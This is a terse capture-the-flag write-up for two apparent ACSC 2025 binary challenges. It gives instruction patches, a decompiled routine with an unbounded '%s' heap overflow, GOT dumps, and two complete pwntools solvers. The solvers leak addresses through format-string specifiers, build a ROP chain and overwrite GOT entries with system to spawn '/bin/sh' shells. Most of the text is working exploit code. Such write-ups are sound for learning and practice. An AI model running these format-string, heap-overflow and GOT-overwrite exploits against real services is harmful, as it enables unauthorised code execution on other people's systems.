
acsc 2025

byte challenge

stage 1

jz short loc_14BA -> jnz short loc_14BA

Screenshot_20250817_171222.png

stage 2

jnz short loc_1548 -> jz short loc_1548

Screenshot_20250817_171328.png

stage 3

jz short loc_15FB -> jz short loc_15FB

Screenshot_20250817_171417.png

stage 4

mov rsi, rax -> mov rsi, rbp

Screenshot_20250817_171118.png

solver 1

from pwn import * import sys e = ELF("prob_patched",checksec=False) libc = ELF("libc.so.6",checksec=False) ld = ELF("ld-linux-x86-64.so.2",checksec=False) nc = "nc 127.0.0.1 9999" if "nc" in nc: HOST = nc.split(" ")[1] PORT = int(nc.split(" ")[2]) if "http" in nc: from urllib.parse import urlparse HOST = urlparse(nc).hostname PORT = urlparse(nc).port dbg = 1 g_script = """ #set max-visualize-chunk-size 0x300 """ context.binary = e if len(sys.argv) > 1: io = remote(host=HOST,port=PORT) else: io = e.process() if dbg: gdb.attach(io,g_script) s = lambda b: io.send(b) sa = lambda a,b: io.sendafter(a,b) sl = lambda b: io.sendline(b) sla = lambda a,b: io.sendlineafter(a,b) r = lambda : io.recv() ru = lambda b:io.recvuntil(b,drop=True) rl = lambda : io.recvline() pu32= lambda b : u32(b.ljust(4,b"\0")) pu64= lambda b : u64(b.ljust(8,b"\0")) hlog= lambda i : print(f"[*]{hex(i)}") shell = lambda : io.interactive() payload = b"" def rst():global payload;payload = b"";log.info("***PAYLOAD RESET***") def pay64(adr:int):global payload;payload += p64(adr) def paybyte(data):global payload;payload += data if type(data) == bytes else data.encode() #%15$p 0x5555555556b1 #%41$p 0x00007ffff7c29e40 sl(b"tsune %15$p %16$p %41$p tsune") #tsune 0x5555555556b1 0x7fffffffdc39 0x7ffff7c29e40 tsune ru(b"tsune") leaks = ru(b"tsune").decode().split(" ") print(f"{leaks=}") e_leak = int(leaks[1],16) e.address = e_leak - (0x5555555556b1 - 0x0000555555554000) hlog(e.address) stk_leak = int(leaks[2],16) l_leak = int(leaks[3],16) libc.address = l_leak - (0x7ffff7c29e40 - 0x00007ffff7c00000) hlog(libc.address) sl(hex(e.address).encode()+b" "+hex(0x5000).encode()) # stage 1 sl(str(0x149f).encode()) sl(str(0x75).encode()) # stage 2 sl(str(0x152d).encode()) sl(str(0x74).encode()) # stage 3 sl(str(0x15e0).encode()) sl(str(0x75).encode()) # stage 4 sl(str(0x1633).encode()) sl(str(0xee).encode()) rst() pay64(stk_leak-0x8-0x100) pay64(libc.address + 0x0010e066) pay64(libc.address + 0x001bbea1) 
pay64(next(libc.search(b"/bin/sh\0"))) pay64(libc.sym["system"]) sl(payload) shell()

book manager

heap overflow @ sub_40191D — the `%s` read has no field width, so it writes past the heap buffer

// Hex-Rays decompilation of the book-manager routine that rewrites one field of
// a stored record (prompts "Book Index" / "Which Info?" / "Your Data"). Kept
// token-for-token as the code under analysis; only comments were added and the
// single collapsed line was reflowed.
int sub_40191D()
{
  int v1; // [rsp+8h] [rbp-8h] BYREF  -- field number, read as a *signed* int
  unsigned int v2; // [rsp+Ch] [rbp-4h] BYREF  -- record index into qword_4040C0

  printf("Book Index: ");
  __isoc99_scanf("%d", &v2);
  // Upper bound 0xA plus a non-NULL slot check; the real size of the
  // qword_4040C0 pointer table is not visible on this page.
  if ( v2 > 0xA || !qword_4040C0[v2] )
    return puts("Invalid Index!");
  sub_401373(1); // helper not shown on this page
  printf("Which Info?: ");
  __isoc99_scanf("%d", &v1);
  printf("Your Data: ");
  // Only the upper bound of v1 is checked; the offset arithmetic below treats
  // v1 as a 1-based field number, so a hardened version would also reject
  // values below 1.
  if ( v1 > 4 )
    return puts("Invalid Option!");
  // Fields 3 and 4 hold pointers to string buffers. `%s` carries no field
  // width, so input longer than the destination overruns its heap chunk --
  // this is the heap overflow the writeup relies on. A width specifier (or a
  // bounded read such as fgets/read with an explicit size) closes it.
  if ( v1 > 2 )
    return __isoc99_scanf("%s", *(_QWORD *)(8LL * v1 - 8 + qword_4040C0[v2]));// pwn point: unbounded %s
  // Fields 1 and 2 are 64-bit integers stored inline in the record.
  return __isoc99_scanf("%lld", 8LL * v1 - 8 + qword_4040C0[v2]);
}

overwriting a record's string pointer so that it points into .got.plt

Screenshot_20250817_172124.png

Leaking a libc address from 0x0000000000404028, then overwriting puts@got.plt with system so that puts("/bin/sh") gives a shell.

free | 0x0000004010b0 | 0x000000404018 | 0x7f633f364290 <system>
puts | 0x0000004010c0 | 0x000000404020 | 0x7f633f364290 <system>
printf | 0x0000004010d0 | 0x000000404028 | 0x7f633f373c90 <printf>
memset | 0x0000004010e0 | 0x000000404030 | 0x7f633f49dd30
read | 0x0000004010f0 | 0x000000404038 | 0x7f633f4201e0 <read>
malloc | 0x000000401100 | 0x000000404040 | 0x7f633f3ac0e0 <malloc>
setvbuf | 0x000000401110 | 0x000000404048 | 0x7f633f396ce0 <setvbuf>
__isoc99_scanf | 0x000000401120 | 0x000000404050 | 0x7f633f3750b0 <__isoc99_scanf>

solver 2

from pwn import * import sys e = ELF("prob",checksec=False) libc = ELF("libc-2.31.so",checksec=False) ld = ELF("ld-2.31.so",checksec=False) nc = "nc 127.0.0.1 5235" if "nc" in nc: HOST = nc.split(" ")[1] PORT = int(nc.split(" ")[2]) if "http" in nc: from urllib.parse import urlparse HOST = urlparse(nc).hostname PORT = urlparse(nc).port dbg = 1 g_script = """ #set max-visualize-chunk-size 0x300 """ context.binary = e if len(sys.argv) > 1: io = remote(host=HOST,port=PORT) else: io = e.process() if dbg: gdb.attach(io,g_script) s = lambda b: io.send(b) sa = lambda a,b: io.sendafter(a,b) sl = lambda b: io.sendline(b) sla = lambda a,b: io.sendlineafter(a,b) r = lambda : io.recv() ru = lambda b:io.recvuntil(b,drop=True) rl = lambda : io.recvline() pu32= lambda b : u32(b.ljust(4,b"\0")) pu64= lambda b : u64(b.ljust(8,b"\0")) hlog= lambda i : print(f"[*]{hex(i)}") shell = lambda : io.interactive() payload = b"" def rst():global payload;payload = b"";log.info("***PAYLOAD RESET***") def pay64(adr:int):global payload;payload += p64(adr) def paybyte(data):global payload;payload += data if type(data) == bytes else data.encode() def register(no,price,author,title): log.info("register") ru(b"Menu: ") sl(b"1") sl(no) sl(price) sl(author) sl(title) def info(idx): log.info("info") ru(b"Menu: ") sl(b"2") sl(str(idx).encode()) ru(b"Info?: ") sl(b"0") return ru(b"1. 
Register") def delete(idx): log.info("delete") ru(b"Menu: ") sl(b"3") sl(str(idx).encode()) def edit(idx,info,content): log.info("edit") ru(b"Menu: ") sl(b"4") sl(str(idx).encode()) sl(str(info).encode()) sl(content) sl(b"/bin/sh\0") register(b"0",b"0",b"/bin/sh",b"AAAAAAAA") register(b"0",b"0",b"tsune",b"BBBBBBBB") rst() paybyte(b"C"*0x30) pay64(0) pay64(0x31) pay64(0x0) pay64(0x0) pay64(0x00404018) pay64(0x00404028) edit(0,4,payload) res = info(1) print(f"{res=}") res = res.split(b"Book Title : ")[1] res = res.split(b"\n")[0] print(f"{res=}") res = pu64(res) print(f"{hex(res)=}") libc.address = res - (0x7e82a6371c90 - 0x00007e82a6310000) hlog(libc.address) rst() pay64(libc.sym["system"]) pay64(libc.sym["system"]) edit(1,3,payload[:15]) delete(0) shell()